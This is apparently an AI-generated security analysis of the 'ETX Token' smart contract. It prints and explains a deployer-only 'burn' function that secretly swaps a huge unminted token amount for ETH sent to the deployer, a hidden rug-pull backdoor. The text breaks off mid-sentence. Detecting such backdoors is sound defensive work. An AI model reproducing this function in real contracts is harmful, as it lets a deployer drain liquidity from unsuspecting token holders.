# ETX Token | Hidden Mint This document outlines a sample AI report of a smart contract with a hidden mint function. Smart contracts are self-executing contracts with the terms of the agreement between buyer and seller being directly written into code. They are often used in blockchain technology. In this report, we will be examining a smart contract that contains a hidden mint function. The hidden mint function is a function that is not visible or documented in the smart contract code. It allows the contract owner to mint new tokens without going through the standard minting process, which can be a potential security vulnerability. To detect the presence of a hidden mint function, we used an AI-based tool that analyzes the bytecode of the smart contract. The tool detected the presence of a hidden function that was not documented in the contract code. Further analysis revealed that the function was indeed a hidden mint function. This report serves as a demonstration of the importance of thorough analysis and testing of smart contracts to identify potential security vulnerabilities and ensure their integrity. ## Contract Code Analysis ### Code Snippet: ```solidity function burn(uint256 value) external { require(msg.sender == _deployer); swapping = true; _allowances[address(this)][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = type(uint).max; address[] memory p = new address[](2); p[0] = address(this); p[1] = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D).swapExactTokensForETH(_totalSupply * 100, 0, p, msg.sender, block.timestamp + 100000); _allowances[address(this)][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = 0; swapping = false; } ``` ### Explanation: The provided function, named burn, does not behave as a typical burn function would. Instead of burning (or destroying) tokens from the total supply, it appears to perform a swap operation on the Uniswap exchange. require(msg.sender == _deployer);: This line of code checks whether the caller of the function is the deployer of the contract. If not, the transaction is reverted. swapping = true;: This line sets the swapping boolean to true. This boolean could potentially be used to prevent reentrancy attacks or other unwanted behavior during the execution of the function. _allowances[address(this)][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = type(uint).max;: This line sets the maximum allowance for the Uniswap V2 Router. It allows the router to spend the contract's tokens on behalf of the contract. IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D).swapExactTokensForETH(_totalSupply * 100, 0, p, msg.sender, block.timestamp + 100000);: The contract interacts with Uniswap V2's Router to swap an amount of tokens equal to _totalSupply * 100 for ETH. This amount of tokens is sent to the Uniswap Router, and the equivalent amount of ETH is expected in return. _allowances[address(this)][0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = 0;: After the swap is completed, the contract sets the allowance of the Uniswap V2 Router for the contract's tokens back to 0, effectively revoking the spending allowance for the contract's tokens. swapping = false;: Finally, the swapping boolean is set to false, indicating the swap operation has ended. Conclusion: The provided burn function, when called by the deployer, does not burn tokens as the name would suggest. Instead, it interacts with Un